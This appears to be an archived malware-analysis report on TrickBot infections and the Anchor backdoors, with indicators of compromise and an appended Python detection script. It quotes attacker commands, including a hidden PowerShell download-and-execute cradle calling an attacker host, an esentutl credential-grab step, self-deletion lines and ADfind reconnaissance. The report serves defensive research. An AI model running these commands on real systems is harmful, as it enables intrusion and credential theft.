{
	"id": "69e124e5-c4b9-447c-b174-6ffde1b80d79",
	"created_at": "2026-04-06T00:16:37.763447Z",
	"updated_at": "2026-04-10T03:33:53.538988Z",
	"deleted_at": null,
	"sha1_hash": "a2da9ba5a5a893a9823c509fb180b1f98e65b4e2",
	"title": "Dropping Anchor: From a TrickBot Infection to the Discovery of the Anchor Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6645580,
	"plain_text": "Dropping Anchor: From a TrickBot Infection to the Discovery of the\r\nAnchor Malware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 15:48:42 UTC\r\nIntroduction\r\nResearch By: Assaf Dahan, Lior Rochberger, Eli Salem, Mary Zhao, Niv Yona, Omer Yampel and Matt Hart\r\nCybereason Nocturnus is monitoring a new wave of targeted campaigns against financial, manufacturing and retail\r\nbusinesses that began in early October. Similar to attacks previously reported by Cybereason, this campaign started with a\r\nTrickBot infection and progressed into a hacking operation targeting sensitive financial systems.\r\nHowever, unlike previous operations that focused on causing a massive ransomware infection (Ryuk and LockerGoga) by\r\ncompromising critical assets like the domain controller, this new operation is focused on targeting point of sale (PoS)\r\nsystems. The campaign leverages a newly discovered malware family called Anchor exclusively for high-profile targets.\r\nLearn more about additional attacks that leverage TrickBot.\r\nThis research focuses on the following aspects of the TrickBot-Anchor attack:\r\n1. Anatomy of the Attack: A step-by-step anatomy of the attacks, including infection vectors and a dissection of the\r\ntools and techniques used by the attackers.\r\n2. New Malware: The discovery of a new malware family called Anchor, which includes the Anchor_DNS and a\r\nnew, undocumented Anchor that has been operating since August 2018 (and potentially even earlier). 
The Anchor malware is a backdoor used very selectively on high-profile targets, and appears to be tightly connected to TrickBot, potentially even authored by the same individuals who created TrickBot.\r\nWhile this blog does not discuss attribution explicitly, the nature of these attacks, specifically the motivation and some of the tools and techniques detailed, bears a certain resemblance to past attacks that were linked to the financially motivated FIN6 threat actor, a group that is known to target POS systems and has been linked to TrickBot infections in the past.\r\nLastly, our blog emphasizes the gravity and danger of commodity malware infections, as they have the potential to escalate into a hacking operation. This can easily lead to a disastrous outcome, whether it be a ransomware infection or the theft of sensitive financial data.\r\nKey Points\r\nThe TrickBot-Anchor Operation: Cybereason Nocturnus is investigating a series of targeted attacks against financial, manufacturing, and retail businesses across the United States and Europe.\r\nTargets POS Systems: The attacks target POS systems to steal sensitive information by taking over critical assets in the victims’ network.\r\nDeploys A Backdoor on High-value Targets: On certain high-profile targets, the attackers selectively use a new variant of the rare Anchor_DNS tool. Anchor_DNS is a backdoor that uses the DNS protocol to stealthily communicate with C2 servers.\r\nUses a New, Undocumented Malware: In addition to the new Anchor_DNS variant, the attackers use a completely new and previously undocumented malware dubbed Anchor. 
Anchor has been in operation since August 2018 and\r\nappears to be tightly related to TrickBot.\r\nAdds Enhancements to TrickBot: This attack adds a new and enhanced stealing module to TrickBot that focuses on\r\nstealing passwords from various products, including the KeePass password manager.\r\nUses Known Tools for Reconnaissance and Lateral Movement: The majority of the initial interactive hacking\r\noperation uses the known tools Meterpreter, PowerShell Empire, and Cobalt Strike for reconnaissance and lateral\r\nmovement.\r\nAbuses the Trust of Certificate Authorities: Many of the payloads in the attacks are signed binaries, which\r\ndemonstrates the ever-growing trend of signed threats that abuse the trust of certificate authorities to bypass\r\ndetection.\r\nTable of Contents\r\nAnatomy of the Attack: A Step-by-Step Analysis\r\nInfection Vector\r\nFrom TrickBot Infection to Interactive Hacking\r\nMeterpreter \u0026 Cobalt Strike Implants\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 1 of 22\n\nActive Directory Discovery using ADfind\r\nNew Anchor_DNS Variant Discovered\r\nDiscovery of The Anchor Malware and its Connection to TrickBot\r\nRise of Signed Malware\r\nConclusion\r\nIndicators of Compromise\r\nMITRE ATT\u0026CK BREAKDOWN\r\nAnatomy of the Attack: A Step-by-Step Analysis\r\nAn overview of the attack tree, as seen in the Cybereason Defense Platform.\r\nInfection Vector\r\nDownloading and injecting TrickBot.\r\nThe attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named “Annual Bonus\r\nReport.doc”. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. 
This differs from previous TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by another malware family such as Emotet.\r\nPhishing email that tricks the user into downloading TrickBot.\r\nThe TrickBot Downloader\r\nThe campaigns use a TrickBot downloader that is a signed binary carrying a Microsoft Word icon so that it passes for a Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer.\r\nTrickBot displays a message box suggesting the user update Microsoft Word or open the file on another computer to preview the document.\r\nWhile at first glance these files can be mistaken for legitimate Microsoft Word files, a closer inspection of the file metadata shows they are not associated with Microsoft Word, nor are they Microsoft Word document files.\r\nMost of the initial payloads in these campaigns are signed with valid certificates to evade security tools. They abuse the relative trust that is given to signed binaries to avoid detection. A valid signature only proves that the signer held the private key for the certificate; it says nothing about whether the file is safe, so the signer name and certificate serial number should be treated as attributes to hunt on rather than as a reason to allow the file.\r\nFile metadata properties for the fake Microsoft Word Document.\r\nSigned malware is an evasive initial entry point into an organization.\r\nThe message box distracts the user as TrickBot’s payload is downloaded, stored in the %TEMP% folder, and executed. 
A new process injects the TrickBot payload into a svchost.exe process.\r\nsvchost.exe injected-code evidence as seen in the Cybereason Platform.\r\nDomain associated with the TrickBot payload download.\r\nThe TrickBot Payload\r\nOnce TrickBot’s main payload is injected into the svchost.exe process, it carries out a series of reconnaissance-related tasks to profile the infected endpoint and the network. This information is crucial, as it determines the course of the attack.\r\nChecking Network Connectivity\r\nTrickBot checks for Internet connectivity by trying to access several designated domains. These domains are preconfigured and belong to legitimate web services, including: checkip.amazonaws.com, ipecho.net, ipinfo.io, api.ipify.org, icanhazip.com, myexternalip.com, wtfismyip.com, ip.anysrc.net. Because these are legitimate services, a single request to one of them is not malicious by itself; what stands out is a non-browser process such as svchost.exe contacting several of them in quick succession.\r\nOnce TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which use Tor-related domains. It collects and sends information about where the target machine is located to the C2 servers.\r\nBrowser History and Credential Theft\r\nAfter TrickBot establishes Internet access and sends information about the location of the target machine, it starts its malicious activity. The module core-parser.dll is reflectively loaded into svchost.exe. core-parser.dll parses the TrickBot config files and extracts IP addresses for secondary C2 communication, redirection, and web injection logic.\r\ncore-parser.dll reflectively loaded into svchost.exe.\r\nTrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. 
The C2 server is responsible for handling the stolen data.\r\nA list of C2 servers extracted from TrickBot’s configuration.\r\nTrickBot also steals data from Internet Explorer by executing the built-in Windows tool esentutl.exe, a living-off-the-land binary (LOLBin):\r\nesentutl /p /o C:\\Users\\[USER]\\AppData\\Local\\Temp\\grabber_temp.edb\r\nThe /p switch repairs an Extensible Storage Engine (ESE) database and /o suppresses the tool’s banner. TrickBot runs it against a copy of the Internet Explorer ESE database that it has written to grabber_temp.edb, so that the copy can be opened cleanly and parsed. A repair of an .edb file under a user’s %TEMP% folder, launched from an injected svchost.exe, is a worthwhile hunting query.\r\nApplication-specific Credential Theft\r\nThis variant of TrickBot employs a new, unique ability to steal passwords from KeePass, a free, open-source password manager. TrickBot's KeePass stealing capabilities seem to be inspired by (or even partially copy-pasted from) a publicly available tool dubbed PoshKPBrute, a script that performs a dictionary attack against KeePass .kdbx files. Once a dictionary word unlocks the database, it dumps all stored passwords as output and sends the attackers the master password.\r\nKeePass stealing brute force tool.\r\nTrickBot’s stealer module also tries to extract keys from FileZilla, OpenSSH and OpenVPN.\r\nTrickBot attempting to steal keys from FileZilla, OpenSSH, and OpenVPN.\r\nReconnaissance Commands\r\nIn addition to several crafted PowerShell commands, the attackers use several legitimate Windows processes to gather information, including nltest.exe, net.exe, ipconfig.exe, whoami.exe, and nslookup.exe. 
They gather information on:\r\nAll trusted domains, domains, and domain controllers\r\nA list of computers and network devices on the network\r\nThe infected machine user and the groups the user belongs to\r\nThe infected machine, including machine name, operating system, workstation domain, and more\r\nNetwork adapters that have connected to the machine and DNS servers\r\nThe net.exe process tree.\r\nNltest / domain_trusts /all_trusts\r\nNet view /all\r\nNltest /domain_trusts\r\nNet view /all /domain\r\nIpconfig /all\r\nNet config workstation\r\nNslookup “-q=srv_kerberos._tcp”\r\n/c “start microsoft-edge:http://127.0.0.1:52715/11984”\r\nReconnaissance commands launched by TrickBot.\r\nThe attackers also test DNS settings from PowerShell by running nslookup.exe. Started with the query-type switch (-q=srv) and no host name, nslookup enters its interactive mode; from that session they resolve the _kerberos._tcp SRV record, which lists the domain’s Kerberos servers, in practice the domain controllers. They use the interactive session to expand their search to other machines on the network.\r\nTrickBot testing DNS settings.\r\nWith this in mind, we gather that the attackers’ goal is to spread to multiple machines within the organization, not just the initially infected machine.\r\nFrom TrickBot Infection to Interactive Hacking\r\nThe threat actor evaluates information sent back to the C2 server and identifies whether they have successfully infected a high-value target. If so, they escalate their efforts by switching to interactive hacking: reconnaissance, credential dumping, lateral movement, and in some cases the mass deployment of ransomware across endpoints connected to the domain controller.\r\nPowerShell Payloads\r\nThe threat actor leverages PowerShell to send additional payloads to the target machine. 
They issue commands to fetch a payload from a secondary server and, once it’s downloaded, immediately execute it on the target machine through PowerShell.\r\npowershell.exe -nop -WindowStyle Hidden -executionpolicy bypass -c \"IEX ((new-object net.webclient).downloadstring('hxxps://northracing[.]net/?a=irs\u0026x=[base64]'))\"\r\nThe northracing[.]net URL serves a PowerShell script as the body of the web page. Though we were unable to fetch the script used in this specific incident, we were able to pivot off the query parameters used in the above PowerShell command (?a=irs\u0026x=) to find a sandbox report for similar activity. The PowerShell payload runs in two stages: the first stage sends basic information to the C2 domain and waits for a response to see if it should continue its operation. If the threat actor does not send a stop flag, the PowerShell script runs in a constant loop and continuously POSTs data to the same domain the payload was fetched from. Each POST request is sent along with a UUID generated from the user’s hostname and the current process ID.\r\nInformation sent along each POST request in the payload.\r\nA POST request containing basic information about the machine is sent, which includes the current user and their domain, the root of the file system, and information about the operating system.\r\nThe PowerShell payloads using WMI to probe for system information.\r\nThis information is sent to the C2 along with the `i` parameter. When a response is received, the payload checks to see if the response matches the value cex01. If it does, the PowerShell script stops executing and kills the task. 
If the response is any other value, the script sets a timeout variable based on the response and continues to the main loop.\r\nThe stop flag is how the attacker selects targets: the check on the initial report indicates they are looking for specific Windows domains or specific operating system versions.\r\nThe main loop sends a POST request to the server with the `t` parameter, which requests the next commands from the server.\r\nThe main loop that sends a POST request to the server.\r\nEach line in the response from the threat actor contains a Base64-encoded command, which is decoded and then immediately executed using PowerShell through the Invoke-Expression (IEX) cmdlet. The output of the command is sent back to the C2 server using a POST request with the `a` parameter.\r\nMeterpreter \u0026 Cobalt Strike Implants\r\nThe attack tree demonstrating the beginning of the hacking operation using Meterpreter.\r\nMeterpreter Implant\r\nThe attackers use a Meterpreter implant to carry out post-exploitation actions. The Cybereason Platform detects both the shellcode and various Meterpreter DLLs reflectively loaded to memory. 
The detected DLLs include:\r\nmetsrv.dll: the Meterpreter core, where the protocol and extension systems are implemented\r\next_server_priv.x86.dll: the priv extension, used for privilege escalation\r\next_server_stdapi.x86.dll: the stdapi extension, a Metasploit post-exploitation module used for reconnaissance\r\nCybereason detects the reflectively loaded malicious modules as a Meterpreter agent and shellcode executed by the Meterpreter agent.\r\nExamining the loaded modules shows which Metasploit modules are loaded.\r\nThe Meterpreter agent creates a connection to port 4444 on the external IP address 91.12.89[.]129.\r\nCobalt Strike Implant\r\nUsing Meterpreter, the attackers injected Cobalt Strike and other Metasploit payloads into the rundll32.exe process.\r\nAttackers injecting Cobalt Strike and other Metasploit payloads into the rundll32.exe process.\r\nDetection of Cobalt Strike, Meterpreter, and shellcode execution.\r\nThe attacker uses the following Metasploit modules:\r\next_server_extapi.x86.dll: obtains clipboard data and manipulates and decrypts the NTDS file\r\next_server_priv.x86.dll: performs privilege escalation\r\next_server_stdapi.x86.dll: performs reconnaissance activity\r\nbypassuac.x64.dll: a post-exploitation module used to bypass User Account Control\r\nPost-exploitation modules reflectively loaded to rundll32.exe\r\nThe connection to the external IP address 199.217.115[.]53 on port 8443.\r\nBoth Meterpreter and Cobalt Strike are legitimate penetration testing tools that have been repeatedly used by various threat actors, including the FIN6 threat actor.\r\nActive Directory Discovery using Cobalt Strike\r\nThe threat actor uses known Cobalt Strike modules to enumerate Active Directory information:\r\nhttps://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Invoke-DACheck.ps1\r\nhttps://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Initial-LAdminCheck.cna\r\nThe attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine’s user is in the local Administrators or Domain Admins group.\r\nAfter verifying the user is an admin, the threat actor gathers information about the domain controllers and their IP addresses using an additional Base64-encoded and compressed PowerShell command.\r\nThe obfuscated and compressed PowerShell command.\r\nThe decoded PowerShell command that attempts to gather domain controller information.\r\nActive Directory Discovery using ADfind\r\nThe attackers deploy a batch script that executes the ADfind.exe tool to enumerate users, groups, and computers of the Windows domain:\r\nadfind.exe -f \"(objectcategory=organizationalUnit)\"\r\nadfind.exe -gcb -sc trustdmp\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -sc trustdmp\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f \"(objectcategory=group)\"\r\nThe ADfind tool has reportedly been used previously in attacks related to FIN6.\r\nNew Anchor_DNS Variant Discovered\r\nOne of the most interesting payloads in these attacks is the Anchor_DNS malware, which was originally discovered in October 2019 by NTT Security. NTT classifies it as a variant of the infamous TrickBot malware that uses DNS tunneling to stealthily communicate with C2 servers. 
Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019.\r\nOldest Anchor_DNS sample observed, SHA-1: b388243bf5899c99091ac2df13339f141659bbd4\r\nThis new variant acts as a sophisticated, stealthy backdoor that selectively chooses high-profile targets. Anchor_DNS is still undergoing rapid development cycles, with code changes and new feature updates every few weeks.\r\nThis is a new variant of Anchor_DNS that appeared as early as November 2019 and exhibits the following changes in code and behavior:\r\nNo self-deletion mechanism, unlike previous samples\r\nNo Internet connectivity checks using legitimate online web services\r\nA built-in capability to check for C2 availability using ICMP (ping)\r\nAdditional partial string encryption and code obfuscation\r\nStatic Analysis Observations\r\nFile name: anchorDNS_x64.exe\r\nSHA-1: 5f1ad1787106de9725005d8da33d815d0994ee83\r\nanchorDNS_x64.exe contains a PDB path with the name of the malware, Anchor_DNS. This file is the 64-bit version of Anchor_DNS; there were earlier instances of the 32-bit version as well. The project name shows that this is the fifth version of Anchor_DNS.\r\nPDB PATH: C:\\simsim\\anchorDNS.v5\\Bin\\x64\\Release\\anchorDNS_x64.pdb\r\nMany strings in the code have typos and grammatical mistakes, further affirming our suspicion that the authors of Anchor_DNS are not native English speakers.\r\nMultiple typos and grammatical mistakes in the Anchor_DNS code.\r\nThe threat actor put considerable effort into obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and a packer. 
The following example shows considerable changes in the code of the WinMain() function between an older variant of Anchor_DNS and the new variant.\r\nAnchor_DNS was able to stay under the radar by requiring specific execution flags. If these command-line arguments are not supplied, Anchor_DNS terminates, which also means a sandbox that runs the sample with no arguments sees nothing.\r\n-i flag:\r\nCreates a scheduled task with the following naming convention (e.g. “Notepad++ autoupdate#94654”):\r\n[random folder name in %APPDATA%] autoupdate#[random_number]\r\nWrites NTFS ADS files ($TASK, $GUID, $FILE)\r\nAlternate Data Stream | ADS Contents | Decoded Contents\r\nedskype.exe:$FILE | QzpcVXNlcnNcdXNlclxBcHBEYXRhXFJvYW1pbmdcU2t5cGVcZWRza3lwZS5leGU= | C:\\Users\\user\\AppData\\Roaming\\\r\nedskype.exe:$TASK | Tm90ZXBhZCsrIGF1dG91cGRhdGUjOTQ2NTQ | Notepad++ autoupdate#94654\r\nedskype.exe:$GUID | [BASE64] | /anchor_dns/[COMPUTER_NAM [clientID]/\r\n-u flag:\r\nNew variant: executes the malware’s main communication module with the C2\r\nOld variant: drops a copy in %TEMP% and creates ADS files ($GUID, $FILE)\r\n-s flag: appears only on older versions of Anchor_DNS and runs the program without creating persistence, self-deleting once done\r\n--log=: expects a file name and writes a log file in C:\\Users\\[USER]\r\nContents of the debug file created by Anchor_DNS.\r\nC2 Communication\r\nOlder and newer versions of Anchor_DNS communicate over DNS. 
However, the newer version described here does not check Internet connectivity using legitimate online web services like ipinfo.io, and instead uses a built-in capability to check for the server’s availability using the ICMP protocol.\r\nDetermining C2 server connectivity.\r\nDNS Tunneling\r\nAnchor_DNS communicates with the C2 servers over DNS using DNS tunneling. With this technique, Anchor_DNS can transfer data, receive commands, and download an additional payload, as detailed in NTT Security’s report on an older Anchor_DNS sample.\r\nBy implementing DNS tunneling, Anchor_DNS can evade certain security products that block other network protocols or overlook DNS traffic. The traffic is not invisible, though: tunneled data shows up in resolver logs as long, high-entropy subdomain labels and an unusual volume of queries to one domain, and an egress policy that forces all resolution through monitored internal resolvers (and blocks direct outbound UDP/TCP 53) makes the channel both visible and blockable.\r\nExample of DNS tunneling traffic generated by Anchor_DNS.\r\nDiscovery of The Anchor Malware and Its Connection to TrickBot\r\nDuring our investigation, we found several unidentified malware samples related to TrickBot infections. The malware is dubbed Anchor by its authors and has been active since August 2018. Unlike Anchor_DNS, the Anchor malware does not implement communication over DNS. 
However, it does share many behavioral, code, and string similarities with Anchor_DNS and some similarities to TrickBot.\r\nEarliest Anchor sample observed (SHA-1: 3ed09498214d93c9ec14a15286546d242ad58943)\r\nPDB path for the earliest Anchor sample found.\r\nMany Anchor samples have a very low or at times zero detection rate by AV vendors, which could explain the limited reports about this malware.\r\nList of Anchor payloads found on VirusTotal with 0/0 detection rate.\r\nThe malware has both x86 and x64 versions and contains an installer component to install the malware.\r\nPayload: anchorInstaller_x86\r\nSHA-1: 3ed09498214d93c9ec14a15286546d242ad58943\r\nSHA-1: 4bba60ff11f8b150b004960c658ad74a707ebcea\r\nPDB path: D:\\MyProjects\\secondWork\\Anchor\\Win32\\Release\\anchorInstaller_x86.pd\r\nPDB path: C:\\Users\\ProFi\\Desktop\\data\\Win32\\anchorInstaller_x86Code\\anchorInstal\r\nPayload: anchorInstaller_x64\r\nSHA-1: e75983b073ff0632e35e237f6622466c2699687c\r\nPayload: Anchor_x86\r\nSHA-1: bd26238fb7d7e16ea79073d882bba00d34dd859c\r\nSHA-1: f3683a0c12154e8bf44d9d942db3eac9e930e7a5\r\nSHA-1: 9ebb541dcb24d564448a6f5e00c613b73eba7148\r\nPDB path: D:\\MyProjects\\secondWork\\Anchor\\Win32\\Release\\Anchor_x86.pdb\r\nPDB path: C:\\Users\\ProFi\\Desktop\\data\\Win32\\anchorInstaller_x86Code\\Anchor_x86\r\nPDB path: D:\\Anchor\\Anchor\\Win32\\Release\\Anchor_x86.pdb\r\nPayload: Anchor_x64\r\nSHA-1: 46c595e580719a4c54f55b4041f81d6e50ab4062\r\nSHA-1: e5dc7c8bfa285b61dda1618f0ade9c256be75d1a\r\nPDB path: D:\\Anchor\\x64\\Debug\\Anchor_x64.pdb\r\nPDB path: C:\\[JOB]\\Anchor\\x64\\Release\\Anchor_x64.pdb\r\nThe Anchor payload is delivered by AnchorInstaller. AnchorInstaller unpacks the Anchor DLL and drops it in the %SYSTEMROOT% or %SYSTEMROOT%\\System32 folder. 
The dropped DLL is loaded by the service netTcpSvc, which is created by the malware.\r\nAnchor service persistence found in the registry.\r\nNTFS ADS File - Storing the GUID\r\nSimilar to Anchor_DNS, Anchor creates an NTFS ADS file $GUID to store its GUID:\r\nAnchor GUID stored as an NTFS ADS.\r\nUnlike Anchor_DNS, which stores the information in Base64, Anchor’s GUID is saved in cleartext. Alternate data streams are not shown by a plain directory listing, but they are easy to enumerate (for example with dir /r, or Get-Item -Stream * in PowerShell), so a $GUID, $TASK or $FILE stream attached to an executable under a user profile is a cheap indicator to hunt for.\r\nSelf Deletion\r\nAnchor and older versions of Anchor_DNS implement the exact same self-deletion routine, using two sets of commands to ensure that the dropper is deleted once the malware has been successfully deployed:\r\ncmd.exe /c timeout 1 \u0026\u0026 del C:\\Users\\[USER]\\[SAMPLE_LOCATION]\"\r\ncmd.exe /C PowerShell 'Start-Sleep 5; Remove-Item C:\\Users\\[USER]\\[SAMPLE_LOCATION]'\r\nC2 Communication\r\nSimilar to TrickBot, Anchor tries to establish Internet connectivity and the external IP of the target machine prior to communicating with its C2 servers. It uses the following hardcoded web services to test connectivity:\r\nOnce it has established connectivity, it communicates with a set of hardcoded C2 servers.\r\nCommunication with a set of hardcoded C2 servers.\r\nThe request and response follow the same C2 communication format as TrickBot.\r\nThe request and response format for Anchor.\r\nConnecting Anchor / Anchor_DNS to TrickBot\r\nAnchor and Anchor_DNS are both directly linked to TrickBot infections, as they are downloaded by TrickBot as secondary payloads. There are also several other similarities, noted below.\r\nGUID Generation Function\r\nThe GUID generation functions for Anchor_DNS and Anchor seem almost identical to that of the GUID generated by TrickBot. 
The GUID follows this pattern:\r\n[Machine_NAME]_[Windows_Version].[Client_ID]\r\nMalware Name | GUID\r\nAnchor_DNS | /anchor_dns/MACHINE-001_W617601.D4CB942AA18EFF519DCBCAE88A0A99FB/\r\nAnchor | /anchor001/jujubox-PC_W617601.6E8516CA48318FB2904E2027B5350B26\r\nTrickBot | /mor49/DAVID-PC_W10017134.55C60B5D13499341D72F5A34C632CFD9\r\nExternal IP Check Web Services\r\nBoth Anchor and older versions of Anchor_DNS use a list of hardcoded online web services to determine Internet connectivity and check the external IP of the infected machine. The same list is also used by TrickBot: checkip.amazonaws.com, ipecho.net, ipinfo.io, api.ipify.org, icanhazip.com, myexternalip.com, wtfismyip.com, and ip.anysrc.net.\r\nIn certain cases, if Internet connectivity cannot be established, Anchor and older versions of Anchor_DNS will delete themselves.\r\nShared C2 Infrastructure\r\nTrickBot, Anchor, and Anchor_DNS typically use separate C2 infrastructure. However, in some instances of this attack, there was C2 server overlap between these infrastructures. 
For example, the IP 23.95.97[.]59, which is hardcoded in an Anchor sample, has also served Anchor_DNS and TrickBot:\r\nAnchor sample with hardcoded IP (SHA-1: 9ebb541dcb24d564448a6f5e00c613b73eba7148)\r\nConnection to TrickBot\r\nThe above IP address was used by TrickBot to download the squlDLL plugin, which includes email harvesting from SQL servers, a screenlocker, and Mimikatz.\r\nConnection to Anchor_DNS\r\nThe same IP resolved to a domain previously used by Anchor_DNS, chishir[.]com.\r\nPassive DNS information for 23.95.97[.]59, taken from VirusTotal.\r\nComparison Between the Anchor Malware Family\r\nThe following table gives a comparison between the different malware in the Anchor malware family.\r\nFeature | Anchor | Old Anchor_DNS | New Anchor_DNS\r\nEarliest observed sample | August 2018 | May 2019 | November 2019\r\nCommand-line arguments | - | + | +\r\nSelf-deletion | + | + | -\r\nNetwork connectivity check via ICMP | - | - | +\r\nNetwork connectivity check via web services | + | + | -\r\nNTFS ADS files | + | + | +\r\nTrickBot’s GUID generation pattern | + (cleartext) | + (Base64) | + (Base64)\r\nCode obfuscation | very little | very little | obfuscated code\r\nC2 communication protocols | HTTP(S) | DNS | ICMP (C2 availability check only), DNS\r\nRise of Signed Malware\r\nCode signing is meant to provide a level of credibility and integrity to a binary from the developer, and to guarantee that the binary has not been tampered with. In the past, signing malware was a practice mostly seen with nation-state threat actors. However, this is no longer the case. 
Nowadays, more and more commodity malware is being signed with valid certificates, effectively bypassing some security solutions that grant trust to signed binaries.\r\nMalicious files in this attack were signed by:\r\nBiller FIN Oy\r\nNIRMAL 0013 Limited\r\nBRO-BURGER, LLC\r\nTrickBot payloads and Anchor / Anchor_DNS payloads were at times signed by the same signer, which further demonstrates that these malware families are most likely used by the same threat actor.\r\nIn searching for additional signed known and unknown files, we were able to identify dozens of malware samples signed by the same organizations. Some were also signed with the same serial number. Both the signer name and the certificate serial number are therefore useful pivots: once a certificate is known to have signed malware, every binary carrying it deserves scrutiny, and the certificate should be reported to the issuing CA for revocation.\r\n1. Biller FIN Oy Signer:\r\nA VirusTotal signer name search shows malware associated with these campaigns:\r\nA VirusTotal serial number search shows malware associated with the campaigns:\r\nConclusion\r\nThis research gives a detailed step-by-step analysis of recent attacks targeting the financial, manufacturing, and retail sectors across the United States and Europe. These attacks start with a TrickBot infection and, with high-profile targets, can escalate to a hacking operation leveraging a new malware, Anchor, and a new variant of Anchor_DNS.\r\nUnlike previously reported TrickBot attacks that resulted in mass ransomware infections, these new attacks focus on stealing sensitive information from POS systems and other sensitive resources in the victims’ network by compromising critical assets.\r\nIn addition, Cybereason discovered a previously undocumented malware called Anchor as well as a new variant of the recently discovered Anchor_DNS malware. 
Both Anchor and Anchor_DNS are directly related to TrickBot infections, have code similarities with it, and sometimes also share C2 infrastructure with TrickBot. Anchor_DNS uses various techniques to keep itself under the radar, such as communication over DNS and reliance on specific command-line arguments in order to run properly. Through these techniques, it is able to evade many security products, including certain sandboxes and AV vendors.\r\nThese attacks stress the danger of commodity malware infections, which are sometimes underestimated because of their frequent use and high volume. It is important to note that, in this attack, once an endpoint is infected with TrickBot it is up to the attackers to decide their next move. If they identify a high-value target, they can go beyond the traditional information-stealing capabilities of TrickBot and use the target machine as an entry point to other machines on the network.\r\nThis research does not focus on the attribution of these attacks. However, through analysis of the evidence and context presented in our research, we noticed certain TTP overlaps with earlier attacks that were attributed to the financially motivated FIN6 threat actor. We leave it to our readers to draw their own conclusions on the attribution of these attacks.\r\nLastly, these attacks show how threat actors are shifting toward signed malware more than ever before. As this trend continues to evolve, security practitioners and security vendors must improve the detection of signed malware and re-think the trust given to signed binaries in general.\r\nThe best way to defend against an attack like this is to use an iterative security process. Read more in our white paper. 
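The reconnaissance phase described above (the nltest, net, ipconfig and nslookup commands under “Reconnaissance Commands” and the ADfind enumeration under “Active Directory Discovery using ADfind”) is easy to spot when the commands are viewed together rather than one at a time. The following Python script is an added example and not code from the Cybereason post; it runs over constructed process-creation log lines (the pipe-separated log format, the host names, the ten-minute window and the threshold of three distinct discovery categories are assumptions) and raises one alert per host and parent process that issues several different discovery commands in a short window.

```python
# Added example (not from the Cybereason post): flag the burst of built-in
# discovery commands (nltest, net, ipconfig, nslookup, ADfind, whoami) that the
# post describes, using constructed process-creation log lines.
# Assumptions: lines are 'timestamp|host|parent image|command line'; a burst is
# three or more distinct discovery categories from one host/parent pair within
# ten minutes.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (category, regex applied to the lower-cased command line)
DISCOVERY_RULES = [
    ('domain_trusts', re.compile(r'\bnltest(\.exe)?\s+/\s*domain_trusts')),
    ('net_view',      re.compile(r'\bnet(\.exe)?\s+view\b')),
    ('net_config',    re.compile(r'\bnet(\.exe)?\s+config\s+workstation')),
    ('ipconfig_all',  re.compile(r'\bipconfig(\.exe)?\s+/all')),
    ('kerberos_srv',  re.compile(r'\bnslookup(\.exe)?\b.*-q(uerytype)?=srv')),
    ('adfind',        re.compile(r'\badfind(\.exe)?\s')),
    ('whoami',        re.compile(r'\bwhoami(\.exe)?\b')),
]
LOG_LINE = re.compile(r'^(?P<ts>[^|]+)\|(?P<host>[^|]+)\|(?P<parent>[^|]+)\|(?P<cmd>.*)$')

def classify(cmdline):
    """Return the discovery category of a command line, or None if it is not one."""
    low = cmdline.lower()
    for name, rx in DISCOVERY_RULES:
        if rx.search(low):
            return name
    return None

def parse_events(lines):
    """Yield (timestamp, host, parent, category) for every discovery command;
    lines that do not parse or are not discovery commands are skipped."""
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        cat = classify(m['cmd'])
        if cat is None:
            continue
        yield datetime.fromisoformat(m['ts']), m['host'].strip(), m['parent'].strip(), cat

def find_discovery_bursts(lines, window=timedelta(minutes=10), min_categories=3):
    """One alert per (host, parent) whose discovery commands span at least
    min_categories distinct categories inside a sliding window."""
    by_key = defaultdict(list)
    for ts, host, parent, cat in parse_events(lines):
        by_key[(host, parent)].append((ts, cat))
    alerts = []
    for (host, parent), events in by_key.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            cats = sorted({c for t, c in events[i:] if t - start <= window})
            if len(cats) >= min_categories:
                alerts.append({'host': host, 'parent': parent,
                               'first_seen': start.isoformat(), 'categories': cats})
                break  # one alert per host/parent pair is enough
    return alerts

SAMPLE_LOG = [  # constructed telemetry, not from a real incident
    '2019-10-15T10:01:02|WS-17|svchost.exe|nltest /domain_trusts /all_trusts',
    '2019-10-15T10:01:05|WS-17|svchost.exe|net view /all',
    '2019-10-15T10:01:07|WS-17|svchost.exe|net view /all /domain',
    '2019-10-15T10:01:09|WS-17|svchost.exe|ipconfig /all',
    '2019-10-15T10:01:12|WS-17|svchost.exe|net config workstation',
    '2019-10-15T10:01:20|WS-17|svchost.exe|nslookup -q=srv _kerberos._tcp',
    '2019-10-15T10:05:00|WS-17|cmd.exe|adfind.exe -f (objectcategory=computer)',
    '2019-10-15T11:30:00|ADMIN-01|cmd.exe|ipconfig /all',   # lone admin command
    '2019-10-15T13:30:00|ADMIN-01|cmd.exe|net view /all',   # two hours later: no burst
    'this line is junk and is skipped',
]

if __name__ == '__main__':
    for alert in find_discovery_bursts(SAMPLE_LOG):
        print(alert)
```

Run it as a script to print the alerts for the embedded sample. The grouping by parent process matters: in this attack the commands come from the injected svchost.exe, and a single ipconfig /all from an administrator’s cmd.exe should not fire, which is why the second host in the sample produces nothing.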
